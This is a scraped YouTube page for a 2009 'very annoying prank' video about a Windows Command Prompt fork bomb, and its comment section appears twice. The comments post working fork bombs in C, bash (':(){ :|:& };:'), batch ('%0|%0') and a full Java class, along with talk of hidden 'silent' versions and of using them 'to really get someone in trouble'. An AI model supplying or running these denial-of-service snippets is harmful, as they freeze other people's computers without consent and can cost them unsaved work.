Loading...
Uploaded by Zenodilodon on Apr 27, 2009
Command Prompt Fork Bomb for Windows " Very Annoying Prank "
Comedy
Standard YouTube License
It works better in C:
while(1) fork();
creates a couple thousand processes and freezes the computer in less than a second!
FangFiftyFive 1 month ago
Check out my Silent version. Runs in the background so you can't tell its running.
kevinsglitches 2 months ago
:(){ :|:& };:
FinsterSeele 3 months ago
is it possible to recover from this with present windows?
kidprettykool1 3 months ago
Add a "%0|%0" and you have a double fork bomb!
uitham 3 months ago
Nice vid! U use Potato to record the video?
DjGazanfar 5 months ago
@soes0kavion wht does this do i may try it
KillDrPhill 5 months ago
to really get someone in trouble :(){ :|:};:
FEE1DEAD 5 months ago
@MultiFrank777 public class ForkBomb
{ public static void main(String[] args) throws java.io.IOException { while(true) { Runtime.getRuntime().exec(new String[]{"java", "-cp", System.getProperty("java.class.path"), "ForkBomb"}); } }
}
soes0kavion 10 months ago
please please please can u tell me how to make java popup fork bomb?
MultiFrank777 10 months ago
Load more suggestions
It works better in C:
while(1) fork();
creates a couple thousand processes and freezes the computer in less than a second!
FangFiftyFive 1 month ago
Check out my Silent version. Runs in the background so you can't tell its running.
kevinsglitches 2 months ago
:(){ :|:& };:
FinsterSeele 3 months ago
is it possible to recover from this with present windows?
kidprettykool1 3 months ago
Add a "%0|%0" and you have a double fork bomb!
uitham 3 months ago
Nice vid! U use Potato to record the video?
DjGazanfar 5 months ago
@soes0kavion wht does this do i may try it
KillDrPhill 5 months ago
to really get someone in trouble :(){ :|:};:
FEE1DEAD 5 months ago
@MultiFrank777 public class ForkBomb
{ public static void main(String[] args) throws java.io.IOException { while(true) { Runtime.getRuntime().exec(new String[]{"java", "-cp", System.getProperty("java.class.path"), "ForkBomb"}); } }
}
soes0kavion 10 months ago
please please please can u tell me how to make java popup fork bomb?
MultiFrank777 10 months ago